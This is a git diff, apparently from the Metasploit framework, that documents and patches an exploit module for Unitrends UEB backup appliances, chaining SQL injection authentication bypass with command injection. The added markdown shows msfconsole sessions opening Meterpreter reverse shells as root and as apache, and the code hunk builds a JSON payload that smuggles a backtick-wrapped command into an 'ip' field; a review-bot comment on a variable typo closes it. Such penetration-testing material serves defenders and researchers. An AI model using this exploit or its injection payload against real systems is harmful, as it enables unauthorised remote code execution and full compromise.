diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.md b/documentation/modules/exploit/linux/http/ueb_api_rce.md
new file mode 100644
index 0000000000..7ffdcbd305
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/ueb_api_rce.md
@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+This exploit leverages a sqli vulnerability for authentication bypass,
+together with command injection for subsequent RCE.
+
+This exploit has two targets:
+
+ 1. Unitrends UEB 9 http api/storage RCE for root privileges
+ 2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges
+
+## Verification Steps
+
+ 1. ```use exploit/linux/http/ueb_api_rce```
+ 2. ```set lhost [IP]```
+ 3. ```set rhost [IP]```
+ 4. ```set target [#]```
+ 5. ```exploit```
+ 6. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit
+
+```
+msf5 > use exploit/linux/http/ueb_api_rce
+msf5 exploit(linux/http/ueb_api_rce) > set target 0
+target => 0
+msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
+rhost => 1.1.1.1
+msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+msf5 exploit(linux/http/ueb_api_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress - 19.76% done (164/830 bytes)
+[*] Command Stager progress - 39.16% done (325/830 bytes)
+[*] Command Stager progress - 56.87% done (472/830 bytes)
+[*] Command Stager progress - 74.82% done (621/830 bytes)
+[*] Command Stager progress - 92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400
+
+meterpreter > sysinfo
+Computer : 1.1.1.1
+OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple : i486-linux-musl
+Meterpreter : x86/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit
+
+```
+msf5 > use exploit/linux/http/ueb_api_rce
+msf5 exploit(linux/http/ueb_api_rce) > set target 1
+target => 1
+msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
+rhost => 1.1.1.1
+msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+msf5 exploit(linux/http/ueb_api_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress - 19.76% done (164/830 bytes)
+[*] Command Stager progress - 39.16% done (325/830 bytes)
+[*] Command Stager progress - 56.87% done (472/830 bytes)
+[*] Command Stager progress - 74.82% done (621/830 bytes)
+[*] Command Stager progress - 92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+
+meterpreter > sysinfo
+Computer : 1.1.1.1
+OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple : i486-linux-musl
+Meterpreter : x86/linux
+meterpreter > getuid
+Server username: uid=48, gid=48, euid=48, egid=48
+meterpreter > shell
+Process 25534 created.
+Channel 1 created.
+whoami
+apache
+```
diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.rb b/documentation/modules/exploit/linux/http/ueb_api_rce.rb
deleted file mode 100644
index 05abde08c9..0000000000
--- a/documentation/modules/exploit/linux/http/ueb_api_rce.rb
+++ /dev/null
@@ -1,42 +0,0 @@
-## Vulnerable Application
-
- Unitrends UEB 9 http api/storage remote root
-
- This exploit leverages a sqli vulnerability for authentication bypass,
- together with command injection for subsequent root RCE.
-
-## Verification Steps
-
- 1. ```use exploit/linux/http/ueb9_api_storage ```
- 2. ```set lhost [IP]```
- 3. ```set rhost [IP]```
- 4. ```exploit```
- 5. A meterpreter session should have been opened successfully
-
-## Scenarios
-
-### UEB 9.1 on CentOS 6.5
-
-```
-msf > use exploit/linux/http/ueb9_api_storage
-msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
-rhost => 10.0.0.230
-msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
-lhost => 10.0.0.141
-msf exploit(ueb9_api_storage) > exploit
-
-[*] Started reverse TCP handler on 10.0.0.141:4444
-[*] 10.0.0.230:443 - pwn'ng ueb 9....
-[*] Command Stager progress - 19.83% done (164/827 bytes)
-[*] Command Stager progress - 39.30% done (325/827 bytes)
-[*] Command Stager progress - 57.44% done (475/827 bytes)
-[*] Command Stager progress - 75.45% done (624/827 bytes)
-[*] Command Stager progress - 93.35% done (772/827 bytes)
-[*] Command Stager progress - 110.88% done (917/827 bytes)
-[*] Sending stage (826872 bytes) to 10.0.0.230
-[*] Command Stager progress - 126.72% done (1048/827 bytes)
-[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
-
-meterpreter > getuid
-Server username: uid=0, gid=0, euid=0, egid=0
-```
\ No newline at end of file
diff --git a/modules/exploits/linux/http/ueb_api_rce.rb b/modules/exploits/linux/http/ueb_api_rce.rb
index 259b156233..b52b573d6f 100644
--- a/modules/exploits/linux/http/ueb_api_rce.rb
+++ b/modules/exploits/linux/http/ueb_api_rce.rb
@@ -97,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Remote
 uri = '/api/storage'
 elsif target.name == 'UEB < 10.1.0'
 parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&|
- params << filter_bad_chars(cmd)
- params << %Q|`'"}|
+ parms << filter_bad_chars(cmd)
+ parms << %Q|`'"}|
 uri = '/api/hosts'
 end
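Review bot: The local name `parms` is one letter away from the conventional `params`, which is exactly the misspelling this hunk corrects in the `elsif target.name == 'UEB < 10.1.0'` branch. Ruby resolves that name only when the branch runs, so the typo would presumably have surfaced as a NameError only with that target selected, which suggests the branch had no coverage. A less confusable name used in both branches, for example `request_body`, would make a repeat unlikely. A one-line comment above the assignment, such as `# body sent to /api/hosts for the 'UEB < 10.1.0' target`, would document the otherwise opaque literal. The enclosing method and the opening `if` start outside the hunk, so it cannot be seen here whether an unrecognised target name leaves `parms` and `uri` unset.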